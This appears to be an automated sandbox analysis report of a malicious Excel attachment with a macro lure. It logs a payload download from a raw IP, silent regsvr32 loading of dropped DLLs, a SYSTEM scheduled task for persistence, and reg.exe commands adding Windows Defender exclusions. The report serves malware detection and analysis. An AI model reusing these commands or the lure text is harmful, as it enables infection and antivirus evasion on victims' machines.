    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
    Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
    Source: Screenshot number: 4Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
    Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd2.red
    PE file has nameless sectionsShow sources
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00096EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00092346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00094FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E34DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E32EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E4162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005EB114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E4495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E1827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_10014FC0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F6EB0
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F2346
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F1758
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000F4FC0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D242A
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1424
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D3726
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D2C41
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D4495
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001DB114
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1D89
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1000
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1827
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D1C5D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D34DA
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D3073
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D32EB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D4162
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10016EB0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10012346
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10011758
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10014FC0
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Compensation-2308017-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,
    Source: Drezd.red.5.drStatic PE information: No import functions for PE file found
    Source: Drezd1.red.11.drStatic PE information: No import functions for PE file found
    Source: Drezd2.red.17.drStatic PE information: No import functions for PE file found
    Source: Drezd.red.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: Compensation-2308017-09272021.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ......................3..........&A.....(.P.............8.......`.........................................................................3.....
    Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
    Source: C:\Windows\System32\reg.exeConsole Write: ................(...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........).....N.......(...............
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\FormsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF102.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLS@34/15@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_100030B7 StartServiceCtrlDispatcherA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_100030B7 StartServiceCtrlDispatcherA,
    Source: Compensation-2308017-09272021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{526DFF4B-742D-4615-933D-F361B4AFFD72}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{B679F068-5F86-42B7-A140-3EB78A7914AE}
    Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{526DFF4B-742D-4615-933D-F361B4AFFD72}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{D5B7291B-5BC5-4AA0-A2E0-203831E973BD}
    Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001A00E push ebx; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10019D5C push cs; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10019E5E push cs; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009A00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00099D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00099E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009BB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push edi; mov dword ptr [esp], 00000004h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E2C41 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], ebx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E242A push 00000000h; mov dword ptr [esp], edi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push esi; mov dword ptr [esp], 00000001h
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], esi
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E3726 push 00000000h; mov dword ptr [esp], ebp
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[1].dat.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: Drezd.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[2].dat.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: Drezd1.red.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name: .rdatat
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: 44466.7516903935[3].dat.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd2.red.0.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name: .rdatat
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd.red.5.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name: .rdatat
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd1.red.11.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name: .rdatat
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd.red.14.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name: .rdatat
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: Drezd2.red.17.drStatic PE information: section name:
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,

    Persistence and Installation Behavior:

    barindex
    Uses cmd line tools excessively to alter registry or file dataShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: reg.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.red
